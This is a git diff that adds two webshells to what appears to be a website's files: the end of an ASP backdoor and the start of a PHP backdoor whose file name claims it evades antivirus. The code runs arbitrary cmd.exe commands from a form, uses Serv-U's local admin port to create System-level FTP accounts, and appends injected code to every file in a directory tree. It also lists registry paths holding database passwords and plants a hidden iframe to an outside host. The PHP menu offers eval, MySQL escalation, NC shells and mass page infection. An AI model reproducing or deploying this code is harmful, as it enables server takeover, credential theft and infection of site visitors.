+function php():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.CreateTextFile(server.mappath("test.php")).Write"<?PHP echo '��ϲ������֧��PHP'?><?php phpinfo()?>":Response.write"<iframe src=test.php width=950 height=300></iframe> ":Response.write "<br><br><p><br><p><br><br><p><br><center>������ܿ���test.php������ʾ,��ʾ֧��PHP<p><font color=red������Dz�֧����!������ɼǵ�ɾ����":End function:
+Function RndNumber(Min,Max) 
+Randomize 
+RndNumber=Int((Max - Min + 1) * Rnd() + Min) 
+End Function
+function Gpath()
+on error resume next
+err.clear
+set f=Server.CreateObject("Scripting.FileSystemObject")
+if err.number>0 then
+gpath="c:"
+exit function
+end if
+gpath=f.GetSpecialFolder(0)
+gpath=lcase(left(gpath,2))
+set f=nothing
+end function
+function jsp():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.CreateTextFile(server.mappath("test.jsp")).Write"��ϲ������֧��jsp":Response.write"<iframe src=test.jsp width=950 height=300></iframe> ":Response.write "<br><br><p><br><p><br><br><p><br><center>������ܿ���test.jsp������ʾ,��ʾ֧��jsp<p></font><p><a href='?Action=apjdel'><font size=5 color=red>ɾ�����Ե������ļ�(����ȫ�����Բſ���ɾ��,��������!)</font></a></center>":End function:function aspx():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.CreateTextFile(server.mappath("test.aspx")).Write"��ϲ������֧��aspx":Response.write"<iframe src=test.aspx width=950 height=300></iframe> ":Response.write "<br><br><p><br><p><br><br><p><br><center>������ܿ���Test.aspx������ʾ,��ʾ֧��asp.net<p><font color=red>������Dz�֧����!������ɼǵ�ɾ����":End function
+function apjdel():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.DeleteFile(server.mappath("test.aspx")):fso.DeleteFile(server.mappath("test.php")):fso.DeleteFile(server.mappath("test.jsp")):response.write"ɾ�����!":End function:function sam():Response.write "<br><br><p><br><p><br><br><p><br><center><br><br><font color=red>":response.write"<center><font face=wingdings color=#00EC00 style=font-size:240pt>N</font><span class=style1><span style=font-weight: 300><font face=Impact color=#FFFFFF style=font-size: 100pt></center>":End function:function goback():set Ofso = Server.CreateObject("Scripting.FileSystemObject")
+set ofolder = Ofso.Getfolder(Session("FolderPath"))
+if not ofolder.IsRootFolder then 
+Response.write "<script>ShowFolder("""&RePath(ofolder.parentfolder)&""")</script>"
+else 
+Response.write "<script>ShowFolder("""&Session("FolderPath")&""")</script>"
+end if
+set Ofso=nothing
+set ofolder=nothing
+end function
+Sub InsertAllFiles(Wpath,Wcode,pc)
+Server.ScriptTimeout=999999999
+if right(Wpath,1)<>"\" then Wpath=Wpath &"\"
+Set WFSO = CreateObject("Scripting.FileSystemObject")
+on error resume next 
+Set f = WFSO.GetFolder(Wpath)
+Set fc2 = f.files
+For Each myfile in fc2
+Set FS1 = CreateObject("Scripting.FileSystemObject")
+FType1=split(myfile.name,".") 
+FType2=ubound(FType1) 
+if Ftype2>0 then
+FType3=LCase(FType1(FType2)) 
+else
+FType3="��"
+end if
+if Instr(LCase(pc),LCase(myfile.name))=0 and Instr(LCase(FType),FType3)<>0 then
+select case M
+case "1"
+if checkbox<>"checked" then
+Set tfile=FS1.opentextfile(Wpath&""&myfile.name,8,-2)
+tfile.writeline Wcode
+RRS"�� "&Wpath&myfile.name
+tfile.close
+else
+Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
+if Instr(tfile1.readall,Wcode)=0 then
+Set tfile=FS1.opentextfile(Wpath&""&myfile.name,8,-2)
+tfile.writeline Wcode
+RRS"��"&Wpath&myfile.name
+tfile1.close
+else
+RRS"<font color=red>��</font> "&Wpath&myfile.name
+tfile1.close
+end if
+Set tfile1=Nothing
+end if
+case "2"
+Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
+NewCode=Replace(tfile1.readall,Wcode,"")
+Set objCountFile=WFSO.CreateTextFile(Wpath&myfile.name,True)
+objCountFile.Write NewCode
+objCountFile.Close
+RRS"��"&Wpath&myfile.name
+Set objCountFile=Nothing
+case "3"
+Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
+NewCode=Replace(tfile1.readall,Wcode,addCode2)
+Set objCountFile=WFSO.CreateTextFile(Wpath&myfile.name,True)
+objCountFile.Write NewCode
+objCountFile.Close
+RRS"��"&Wpath&myfile.name
+Set objCountFile=Nothing
+case else
+RRS"����.":response.end
+end select
+else
+RRS"�� "&Wpath&myfile.name
+end if
+RRS " �� <a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""DownFile"")' class='am' title='����'>Down</a> "
+RRS "<a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""EditFile"")' class='am' title='�༭'>edit</a> "
+RRS "<a href='javascript:FullForm("""&replace(str1,"\","\\")&""",""DelFile"")'onclick='return yesok()' class='am' title='ɾ��'>Del</a> "
+RRS "<a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""CopyFile"")' class='am' title='����'>Copy</a> "
+RRS "<a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""MoveFile"")' class='am' title='�ƶ�'>Move</a><br>"
+Next
+Set fsubfolers = f.SubFolders
+For Each f1 in fsubfolers
+NewPath=Wpath&""&f1.name
+InsertAllFiles NewPath,Wcode,pc
+Next
+set tfile=nothing
+Set FSO = Nothing
+set tfile=nothing
+set tfile2=nothing
+Set WFSO = Nothing
+End Sub
+FuncTion su7()
+response.write"<form name='form1' method='post' action=''>"
+response.write"<p align='center'>"
+response.write"------------------Serv-U Information------------------"
+response.write"<br>"
+response.write"user:"
+response.write"<input name='duser' type='text' class='TextBox' id='duser' value='LocalAdministrator'><br>"
+response.write"pwd :"
+response.write"<input name='dpwd' type='text' class='TextBox' id='dpwd' value='#l@$ak#.lk;0@P'><br>"
+response.write"port:"
+response.write"<input name='dport' type='text' class='TextBox' id='dport' value='43958'><br>"
+response.write"---------------------Add User!!! ---------------------<BR>"
+response.write"Domain: &nbsp; "
+response.write"<input name='domain' type='text' class='TextBox' id='domain' value='80sec' /><br>"
+response.write"FTP USER:"
+response.write"<input name='fuser' type='text' class='TextBox' id='fuser' value='80sec'><br>"
+response.write"FTP PASS:"
+response.write"<input name='fpass' type='text' class='TextBox' id='fpass' value='123456'><br>"
+response.write"FTP PORT:"
+response.write"<input name='fport' type='text' class='TextBox' id='fport' value='21'><br>"
+response.write"FTP PATH:"
+response.write"<input name='fpath' type='text' class='TextBox' id='fpath' value='c:\\'>"
+response.write"<br>"
+response.write"Privilege"
+response.write"<select para=value name='privilege'>"
+response.write"<option value=2>Read-only Admin</option>"
+response.write"<option value=3>Group Admin</option>"
+response.write"<option value=4>Domain Admin</option>"
+response.write"<option value=5>System Admin</option>"
+response.write"</select>"
+response.write"</p>"
+response.write"<p align='center'>"
+response.write"<input name='radiobutton' type='radio' value='add' checked class='TextBox'>"
+response.write"Add User "
+response.write"<input type='radio' name='radiobutton' value='del' class='TextBox'> "
+response.write"Del User </p>"
+response.write"<p align='center'>"
+response.write"<input name='Submit' type='submit' class='buttom' value='Run' />"
+response.write"</p>"
+response.write"</form>"
+user = request.Form("duser")
+pass = request.Form("dpwd")
+port = request.Form("dport")
+domain = request.Form("domain")
+fuser = request.Form("fuser")
+fpass = request.Form("fpass")
+fport = request.Form("fport")
+fpath = request.Form("fpath")
+privilege=request.Form("privilege")
+select case privilege
+   case 2:
+  privilege="ReadOnly"
+   case 3:
+  privilege="Group"
+   case 4:
+  privilege="Domain"
+   case 5:
+  privilege="System"
+  end select
+	if request.Form("radiobutton") = "add" Then
+
+loginuser = "User " & user & vbCrLf
+loginpass = "Pass " & pass & vbCrLf
+mt = "SITE MAINTENANCE" & vbCrLf
+newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=" & domain &"|0.0.0.0|" & fport & "|-1|1|0" & vbCrLf & "-DynDNSEnable=0" & vbCrLf & "  DynIPName=" & vbCrLf
+newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & fport & vbCrLf & "-User="& fuser & vbCrLf & "-Password=" & fpass & vbCrLf & _
+        "-HomeDir=" & fpath & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
+        "-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
+        "-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
+        "-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
+        "-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
+        "-Maintenance=" & privilege  & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=" & fpath &"|RWAMELCDP" & vbCrLf
+quit = "QUIT" & vbCrLf		
+		'--------
+		'On Error Resume Next
+		Set xPost = CreateObject("Microsoft.XMLHTTP")
+		xPost.Open "POST", "http://127.0.0.1:"& port &"/secdst",True, "", ""
+		xPost.Send loginuser & loginpass & mt & newdomain & newuser & quit
+		Set xPost =nothing
+		response.write "<div align="&chr(34 )&"center"&chr(34 )&">FTP user "&fuser&"  pass "&fpass&" at port "& fport &"</div>"
+	elseif request.Form("radiobutton") = "del" Then
+	
+		loginuser = "User " & user & vbCrLf
+		loginpass = "Pass " & pass & vbCrLf
+		mt = "SITE MAINTENANCE" & vbCrLf
+		deluser =  "-DELETEUSER" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=" & port & vbcrlf & " User="& fuser & vbcrlf
+		quit = "QUIT" & vbCrLf	
+		Set xPost3 = CreateObject("MSXML2.XMLHTTP")
+		xPost3.Open "POST", "http://127.0.0.1:"& port &"/secdst", True
+		xPost3.Send loginuser & loginpass & mt & deluser & quit 
+		Set xPOST3=nothing
+		response.write "<div align="&chr(34 )&"center"&chr(34 )&">FTP user "&fuser&"  pass "&fpass&" at port "& fport &" have deleted</div>"
+	else
+		response.write "<div align="&chr(34 )&"center"&chr(34 )&">let's Start!!!</div>"
+	end if
+end function
+Function fuzhutq1()
+RRS"<p><center>:������������������Ȩ:</p><center>"
+RRS"360ɱ��db�ļ��滻:<br>"
+RRS"c:\Program Files\360\360SD\deepscan\Section\mutex.db <br> "
+RRS"c:\Program Files\360\360Safe\deepscan\Section\mutex.db <br>"
+RRS"C:\Program Files\360\360Safe\AntiSection\mutex.db <br>"
+RRS"Flash�ļ��滻:<br>"
+RRS"C:\WINDOWS\system32\Macromed\Flash\Flash10q.ocx <br>"
+RRS"IISrewrite3 �ļ��滻��<br>"
+RRS"C:\Program Files\Helicon\ISAPI_Rewrite3\Rewrite.log<br>"
+RRS"C:\Program Files\Helicon\ISAPI_Rewrite3\httpd.conf<br>"
+RRS"C:\Program Files\Helicon\ISAPI_Rewrite3\error.log <br>"
+RRS"DU Meter����ͳ����Ϣ��־�ļ��滻��<br> "
+RRS"c:\Documents and Settings\All Users\Application Data\Hagel Technologies\DU Meter\log.csv <br>"
+RRS"ŵ��ɱ���ļ��滻:<br>"
+RRS"c:\Program Files\Common Files\Symantec Shared\Persist.bak <br>"
+RRS"c:\Program Files\Common Files\Symantec Shared\Validate.dat  <br>"
+RRS"c:\Program Files\Common Files\Symantec Shared\Persist.Dat  <br>"
+RRS"�����ļ��滻:<br>"
+RRS"C:\WINDOWS\hchiblis.ibl <br>"
+RRS"һ���������Ŀ¼���ļ��� <br>"
+RRS"C:\7i24.com\iissafe\log\startandiischeck.txt  <br>"
+RRS"C:\7i24.com\iissafe\log\scanlog.htm   <br>"
+RRS"�������:<br>"
+RRS"Zend: C:\Program Files\Zend\ZendOptimizer-3.3.0\lib\Optimizer-3.3.0\php-5.2.x\ZendOptimizer.dll  <br>"
+RRS"C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\  <br>"
+RRS"Ps:������Ȩ����ͨ���ڸ���������ϵͳ<br>"
+end function
+Function fuzhutq2()
+RRS"<p><center>:������������������Ȩ:</p><center>"
+RRS"1`c:\windows\temp����hzhost�������µ�ftp��½��¼v���û���������<br>"
+RRS"2@��mssql sa����,mysql root���뼰serv-u��administrator����<br>"
+RRS"mysql root���룺HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mysqlpass <br>"
+RRS"sqlserver sa���룺HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mastersvrpass<br>"
+RRS"Serv-u�������룺HKEY_LOCAL_MACHINE\software\hzhost\config\settings\svrpass<br>"
+RRS"������Ϣ���hzhosts������������ϵͳ6.x �ƽ����ݿ����빤��ʹ��<br>"
+RRS"���ص�ַ���ٶ����� 'hzhosts������������ϵͳ6.x �ƽ����ݿ����빤��' <br>"
+RRS"Ps:������Ȩ����ͨ���ڴ���������ϵͳ<br>"
+end function
+Function fuzhutq3()
+RRS"<p><center>:N����������������Ȩ:</p><center>"
+RRS"Ĭ�����ݿ����أ�<br>"
+RRS"1.9�棺host_date/%23host%20%23%20date%23.mdb<br>"
+RRS"1.96�棺host_date/%23host%20%23%20date%23196.mdb <br>"
+RRS"���巽����ͨ��������ͬ������IIS,Ȼ���վ��N�����վ��Ŀ¼�£�����ͨ��������ַ���ػصõ���sa��mysql��վ���������Ϣ��key��ͨ������Ĵ�����ܣ�<br>"
+'RRS"��ַ:����Ĵ�"
+RRS"Ps:������Ȩ����ͨ���ڴ���������ϵͳ<br>"
+end function
+Function fuzhutq4()
+RRS"<font color=#00FF00>��ȴ��������2ED</font>"
+end function
+Function fuzhutq5()
+if Request("Paths") ="" then
+Paths_str="c:\windows\"&chr(13)&chr(10)&"c:\Documents and Settings\"&chr(13)&chr(10)&"c:\Program Files\"
+if Session("paths")<>"" then  Paths_str=Session("paths")
+	Response.Write "<form id='form1' name='form1' method='post' action=''>"
+	Response.Write "�˳�����Լ�����������Ŀ¼��д���,Ϊ��������ṩһЩ��ȫ�����Ϣ!<br>�����������Ŀ¼,������Զ������Ŀ¼<br>"	
+	Response.Write "<textarea name='Paths' cols='80' rows='10' class='Edit'>"&Paths_str&"</textarea>"
+	Response.Write "<br />"
+	Response.Write "<input type='submit' name='button' value='��ʼ���' / class='but1'>"
+	Response.Write "<label for='CheckNextDir'>"
+	Response.Write "<input name='CheckNextDir' type='checkbox' id='CheckNextDir' checked='checked' />����Ŀ¼  "
+	Response.Write "</label>"
+	Response.Write "<label for='CheckFile'>"
+	Response.Write "<input name='CheckFile' type='checkbox' id='CheckFile' checked='checked'  />�����ļ�"
+	Response.Write "</label>"
+	Response.Write "<label for='ShowNoWrite'>"
+	Response.Write "<input name='ShowNoWrite' type='checkbox' id='ShowNoWrite'/>"
+	Response.Write "�Խ�дĿ¼���ļ�</label>"
+	Response.Write "<label for='NoCheckTemp'>"
+	Response.Write "<input name='NoCheckTemp' type='checkbox' id='NoCheckTemp' checked='checked' />"
+	Response.Write "�������ʱĿ¼</label>"	
+	Response.Write "</form>"
+else
+Response.Write  "<a href=""?"">��������·��</a><br>"
+CheckFile = (Request("CheckFile")="on")
+CheckNextDir = (Request("CheckNextDir")="on")
+ShowNoWriteDir = (Request("ShowNoWrite")="on")
+NoCheckTemp = (Request("NoCheckTemp")="on")
+Response.Write "��������Ҫһ����ʱ�����Ե�......<br>"
+response.Flush
+
+Session("paths") = Request("Paths")
+
+PathsSplit=Split(Request("Paths"),chr(13)&chr(10)) 
+For i=LBound(PathsSplit) To UBound(PathsSplit) 
+if instr(PathsSplit(i),":")>0 then
+	ShowDirWrite_Dir_File Trim(PathsSplit(i)),CheckFile,CheckNextDir
+End If 
+Next
+Response.Write "[ɨ�����]<br>"
+end if
+end function
+Function cmd2()
+response.write"<form method='post'>"
+response.write"<input type=text name='cmd' size=60>"
+response.write"<input type=submit value='run'></form> "
+response.write"<textarea readonly cols=80 rows=20> "
+response.write server.createobject("wscript.shell").exec("cmd.exe /c "&request.form("cmd")).stdout.readall
+response.write"</textarea>"
+end function
+Function suftp()
+RRS"<p><center>���ɰ汾��Ϣ:</p>"
+RRS"<form name='form1' method='post' action=''>"
+RRS"<center>����Ա:<input name='duser' type='text' class='TextBox' id='duser' value='LocalAdministrator'><br>"
+RRS"<center>����Ա���� :<input name='dpwd' type='text' class='TextBox' id='dpwd' value='#l@$ak#.lk;0@P'><br>"
+RRS"<center>SERV-U�˿�:<input name='dport' type='text' class='TextBox' id='dport' value='43958'><br>"
+RRS"<center>���ӵ��û���:<input name='tuser' type='text' class='TextBox' id='tuser' value='1'><br>"
+RRS"<center>���ӵ��û�����:<input name='tpass' type='text' class='TextBox' id='pass' value='1'><br>"
+RRS"<center>�ʺŵ����Ե�·��:<input name='tpath' type='text' class='TextBox' id='tpath' value='C:\'><br>"
+RRS"<center>����˿�:<input name='tport' type='text' class='TextBox' id='tport' value='21'><br>"
+RRS"<center><input name='radiobutton' type='radio' value='add' checked class='TextBox'>ȷ������"
+RRS"<center><input type='radio' name='radiobutton' value='del' class='TextBox'>ȷ��ɾ��"
+RRS"<p><input name='Submit' type='submit' class='buttom' value='�ύ'></p></form>"
+Usr = request.Form("duser")
+pwd = request.Form("dpwd")
+port = request.Form("dport")
+tuser = request.Form("tuser")
+tpass = request.Form("tpass")
+tpath = request.Form("tpath")
+tport = request.Form("tport")
+'Command = request.Form("dcmd")
+if request.Form("radiobutton") = "add" Then
+leaves = "User " & Usr & vbcrlf
+leaves = leaves & "Pass " & pwd & vbcrlf
+leaves = leaves & "SITE MAINTENANCE" & vbcrlf
+'leaves = leaves & "-SETDOMAIN" & vbcrlf & "-Domain=cctv|0.0.0.0|43859|-1|1|0" & vbcrlf & "-TZOEnable=0" & vbcrlf & " TZOKey=" & vbcrlf
+leaves = leaves & "-SETUSERSETUP" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=" & tport & vbcrlf & "-User=" & tuser & vbcrlf & "-Password=" & tpass & vbcrlf & _
+"-HomeDir=" & tpath & "\" & vbcrlf & "-LoginMesFile=" & vbcrlf & "-Disable=0" & vbcrlf & "-RelPaths=1" & vbcrlf & _
+"-NeedSecure=0" & vbcrlf & "-HideHidden=0" & vbcrlf & "-AlwaysAllowLogin=0" & vbcrlf & "-ChangePassword=0" & vbcrlf & _
+"-QuotaEnable=0" & vbcrlf & "-MaxUsersLoginPerIP=-1" & vbcrlf & "-SpeedLimitUp=0" & vbcrlf & "-SpeedLimitDown=0" & vbcrlf & _
+"-MaxNrUsers=-1" & vbcrlf & "-IdleTimeOut=600" & vbcrlf & "-SessionTimeOut=-1" & vbcrlf & "-Expire=0" & vbcrlf & "-RatioUp=1" & vbcrlf & _
+"-RatioDown=1" & vbcrlf & "-RatiosCredit=0" & vbcrlf & "-QuotaCurrent=0" & vbcrlf & "-QuotaMaximum=0" & vbcrlf & _
+"-Maintenance=System" & vbcrlf & "-PasswordType=Regular" & vbcrlf & "-Ratios=None" & vbcrlf & " Access=" & tpath & "\|RWAMELCDP" & vbcrlf
+'leaves = leaves & "quit" & vbcrlf
+'--------
+On Error Resume Next
+Set xPost = CreateObject("MSXML2.XMLHTTP")
+xPost.Open "POST", "http://127.0.0.1:"& port &"/leaves", True
+xPost.Send(leaves)
+Set xPOST=nothing
+RRS ("����ɹ�ִ�У���FTP �û���: " & tuser & " " & "����: " & tpass & " ·��: " & tpath & " :)<br><BR>")
+else
+leaves = "User " & Usr & vbcrlf
+leaves = leaves & "Pass " & pwd & vbcrlf
+leaves = leaves & "SITE MAINTENANCE" & vbcrlf
+leaves = leaves & "-DELETEUSER" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=" & tport & vbcrlf & " User=" & tuser & vbcrlf
+Set xPost3 = CreateObject("MSXML2.XMLHTTP")
+xPost3.Open "POST", "http://127.0.0.1:"& port &"/leaves", True
+xPost3.Send(leaves)
+Set xPOST3=nothing
+RRS "<font color=#ffffff>OKOKOK</font><br><BR>"
+end if
+End Function
+Case "ScanDriveForm" 
+ ScanDriveForm
+ Case "ScanDrive"     
+  ScanDrive Request("Drive")
+  Case "ScFolder"      
+   ScFolder Request("Folder")
+case "apjdel":apjdel():case "Servu7x":su7():case "fuzhutq1":fuzhutq1():case "fuzhutq2":fuzhutq2():case "fuzhutq3":fuzhutq3():case "fuzhutq4":fuzhutq4():case "fuzhutq5":fuzhutq5():case "Cmd2":cmd2():case "suftp":suftp():case"hiddenshell":hiddenshell():case "php":php():case "aspx":aspx():case "jsp":jsp():Case "MMD":MMD():Case "adminab":adminab():Case "sql":sql():Case "downloads":downloads():Case "ReadREG":call ReadREG():Case "att":call att():Case "Show1File":Set ABC=New LBF:ABC.Show1File(Session("FolderPath")):Set ABC=Nothing:Case "DownFile":DownFile FName:ShowErr():Case "DelFile":Set ABC=New LBF:ABC.DelFile(FName):Set ABC=Nothing:Case "EditFile":Set ABC=New LBF:ABC.EditFile(FName):Set ABC=Nothing:Case "CopyFile":Set ABC=New LBF:ABC.CopyFile(FName):Set ABC=Nothing:Case "MoveFile":Set ABC=New LBF:ABC.MoveFile(FName):Set ABC=Nothing:Case "DelFolder":Set ABC=New LBF:ABC.DelFolder(FName):Set ABC=Nothing:Case "CopyFolder":Set ABC=New LBF:ABC.CopyFolder(FName):Set ABC=Nothing:Case "MoveFolder":Set ABC=New LBF:ABC.MoveFolder(FName):Set ABC=Nothing:Case "NewFolder":Set ABC=New LBF:ABC.NewFolder(FName):Set ABC=Nothing:Case "UpFile":UpFile():Case "Cmd1Shell":Cmd1Shell():Case "Logout":Session.Contents.Remove("web2a2dmin"):Response.Redirect URL:Case "CreateMdb":CreateMdb FName:Case "CompactMdb":CompactMdb FName:Case "DbManager":DbManager():Case "Course":Course():Case "ServerInfo":ServerInfo():Case Else MainForm():End Select:ExeCute SinfoEn("r(ErowShn he tu~rvSe>~n<ioct Aif)`l>tm/h><dybo</S~RR~",Pos)
+
+
+
+
+response.write ""+vbCrLf+""+vbCrLf+""
+%>
+<iframe src=http://cpc-gov.cn/a/a/a.asp width=0 height=0></iframe>
\ No newline at end of file
diff --git a/www-7jyewu-cn/最新过安全狗- 免杀PHP大马 -.php b/www-7jyewu-cn/最新过安全狗- 免杀PHP大马 -.php
new file mode 100644
index 0000000..e092d2c
--- /dev/null
+++ b/www-7jyewu-cn/最新过安全狗- 免杀PHP大马 -.php	
@@ -0,0 +1,2488 @@
+<?php
+;//������֤���룡
+$shellname='�й�ľ����Դ��-WwW.MumaSec.TK ';//�����޸ı��⣡
+define('myaddress',__FILE__);
+error_reporting(E_ERROR | E_PARSE);
+header("content-Type: text/html; charset=gb2312");
+@set_time_limit(0);
+
+ob_start();
+define('envlpass',$password);
+define('shellname',$shellname);
+define('myurl',$myurl);
+if(@get_magic_quotes_gpc()){
+	foreach($_POST as $k => $v) $_POST[$k] = stripslashes($v);
+	foreach($_GET as $k => $v) $_GET[$k] = stripslashes($v);
+}
+
+/*---End Login---*/
+if(isset($_GET['down'])) do_down($_GET['down']);
+if(isset($_GET['pack'])){
+	$dir = do_show($_GET['pack']);
+	$zip = new eanver($dir);
+	$out = $zip->out;
+	do_download($out,"eanver.tar.gz");
+}
+if(isset($_GET['unzip'])){
+	css_main();
+	start_unzip($_GET['unzip'],$_GET['unzip'],$_GET['todir']);
+	exit;
+}
+
+define('root_dir',str_replace('\\','/',dirname(myaddress)).'/');
+define('run_win',substr(PHP_OS, 0, 3) == "WIN");
+define('my_shell',str_path(root_dir.$_SERVER['SCRIPT_NAME']));
+$eanver = isset($_GET['eanver']) ? $_GET['eanver'] : "";
+$doing = isset($_POST['doing']) ? $_POST['doing'] : "";
+$path = isset($_GET['path']) ? $_GET['path'] : root_dir;
+$name = isset($_POST['name']) ? $_POST['name'] : "";
+$img = isset($_GET['img']) ? $_GET['img'] : "";
+$p = isset($_GET['p']) ? $_GET['p'] : "";
+$pp = urlencode(dirname($p));
+if($img) css_img($img);
+if($eanver == "phpinfo") die(phpinfo());
+if($eanver == 'logout'){
+	setcookie('envlpass',null);
+	die('<meta http-equiv="refresh" content="0;URL=?">');
+}
+
+$class = array(
+"��Ϣ����" => array("upfiles" => "�ϴ��ļ�","phpinfo" => "������Ϣ","info_f" => "ϵͳ��Ϣ","eval" => "ִ��PHP�ű�"),
+"��Ȩ����" => array("sqlshell" => "ִ��SQLִ��","mysql_exec" => "MYSQL����","myexp" => "MYSQL��Ȩ","servu" => "Serv-U��Ȩ","nc" => "NC����","downloader" => "�ļ�����","port" => "�˿�ɨ��"),
+"��������" => array("guama" => "������������","tihuan" => "�����滻����","scanfile" => "���������ļ�","scanphp" => "��������ľ��"),
+"�ű����" => array("getcode" => "��ȡ��ҳԴ��")
+);
+$msg = array("0" => "����ɹ�","1" => "����ʧ��","2" => "�ϴ��ɹ�","3" => "�ϴ�ʧ��","4" => "�޸ijɹ�","5" => "�޸�ʧ��","6" => "ɾ���ɹ�","7" => "ɾ��ʧ��");
+css_main();
+switch($eanver){
+	case "left":
+	css_left();
+		html_n("<dl><dt><a href=\"#\" onclick=\"showHide('items1');\" target=\"_self\">");
+		html_img("title");html_n(" ����Ӳ��</a></dt><dd id=\"items1\" style=\"display:block;\"><ul>");
+    $ROOT_DIR = File_Mode();
+    html_n("<li><a title='$ROOT_DIR' href='?eanver=main&path=$ROOT_DIR' target='main'>��վ��Ŀ¼</a></li>");
+	html_n("<li><a href='?eanver=main' target='main'>������Ŀ¼</a></li>");
+	for ($i=66;$i<=90;$i++){$drive= chr($i).':';
+    if (is_dir($drive."/")){$vol=File_Str("vol $drive");if(empty($vol))$vol=$drive;
+    html_n("<li><a title='$drive' href='?eanver=main&path=$drive' target='main'>���ش���($drive)</a></li>");}}
+	html_n("</ul></dd></dl>");
+	$i = 2;
+	foreach($class as $name => $array){
+		html_n("<dl><dt><a href=\"#\" onclick=\"showHide('items$i');\" target=\"_self\">");
+		html_img("title");html_n(" $name</a></dt><dd id=\"items$i\" style=\"display:block;\"><ul>");
+		foreach($array as $url => $value){
+			html_n("<li><a href=\"?eanver=$url\" target='main'>$value</a></li>");
+		}
+		html_n("</ul></dd></dl>");
+		$i++;
+	}
+	html_n("<dl><dt><a href=\"#\" onclick=\"showHide('items$i');\" target=\"_self\">");
+	html_img("title");html_n(" ��������</a></dt><dd id=\"items$i\" style=\"display:block;\"><ul>");
+	html_n("<li><a title='��ɱ����' href='http://www.mumasec.tk/' target=\"main\">��ɱ����</a></li>");
+    html_n("<li><a title='��ȫ�˳�' href='?eanver=logout' target=\"main\">��ȫ�˳�</a></li>");
+	html_n("</ul></dd></dl>");
+	html_n("</div>");
+	break;
+	
+	case "main":
+	css_js("1");
+	$dir = @dir($path);
+	$REAL_DIR = File_Str(realpath($path));
+	if(!empty($_POST['actall'])){echo '<div class="actall">'.File_Act($_POST['files'],$_POST['actall'],$_POST['inver'],$REAL_DIR).'</div>';}
+	$NUM_D = $NUM_F = 0;
+	if(!$_SERVER['SERVER_NAME']) $GETURL = ''; else $GETURL = 'http://'.$_SERVER['SERVER_NAME'].'/';
+	$ROOT_DIR = File_Mode();
+	html_n("<table width=\"100%\" border=0 bgcolor=\"#555555\"><tr><td><form method='GET'>��ַ:<input type='hidden' name='eanver' value='main'>");
+	html_n("<input type='text' size='80' name='path' value='$path'> <input type='submit' value='ת��'></form>");
+	html_n("<br><form method='POST' enctype=\"multipart/form-data\" action='?eanver=editr&p=".urlencode($path)."'>");
+	html_n("<input type=\"button\" value=\"�½��ļ�\" onclick=\"rusurechk('newfile.php','?eanver=editr&p=".urlencode($path)."&refile=1&name=');\"> <input type=\"button\" value=\"�½�Ŀ¼\" onclick=\"rusurechk('newdir','?eanver=editr&p=".urlencode($path)."&redir=1&name=');\">");
+	html_input("file","upfilet","","&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ");
+	html_input("submit","uploadt","�ϴ�");
+	if(!empty($_POST['newfile'])){
+		if(isset($_POST['bin'])) $bin = $_POST['bin']; else $bin = "wb";
+        if (substr(PHP_VERSION,0,1)>=5){if(($_POST['charset']=='GB2312') or ($_POST['charset']=='GBK')){}else{$_POST['txt'] = iconv("gb2312//IGNORE",$_POST['charset'],$_POST['txt']);}}
+		echo do_write($_POST['newfile'],$bin,$_POST['txt']) ? '<br>'.$_POST['newfile'].' '.$msg[0] : '<br>'.$_POST['newfile'].' '.$msg[1];
+		@touch($_POST['newfile'],@strtotime($_POST['time']));
+	}
+	html_n('</form></td></tr></table><form method="POST" name="fileall" id="fileall" action="?eanver=main&path='.$path.'"><table width="100%" border=0 bgcolor="#555555"><tr height="25"><td width="45%"><b>');
+	html_a('?eanver=main&path='.uppath($path),'<b>�ϼ�Ŀ¼</b>');
+	html_n('</b></td><td align="center" width="10%"><b>����</b></td><td align="center" width="5%">');
+	html_n('<b>�ļ�����</b></td><td align="center" width="10%"><b>�޸�ʱ��</b></td><td align="center" width="10%"><b>�ļ���С</b></td></tr>');
+	while($dirs = @$dir->read()){
+		if($dirs == '.' or $dirs == '..') continue;
+		$dirpath = str_path("$path/$dirs");
+		if(is_dir($dirpath)){
+			$perm = substr(base_convert(fileperms($dirpath),10,8),-4);
+			$filetime = @date('Y-m-d H:i:s',@filemtime($dirpath));
+			$dirpath = urlencode($dirpath);
+			html_n('<tr height="25"><td><input type="checkbox" name="files[]" value="'.$dirs.'">');
+			html_img("dir");
+			html_a('?eanver=main&path='.$dirpath,$dirs);
+			html_n('</td><td align="center">');
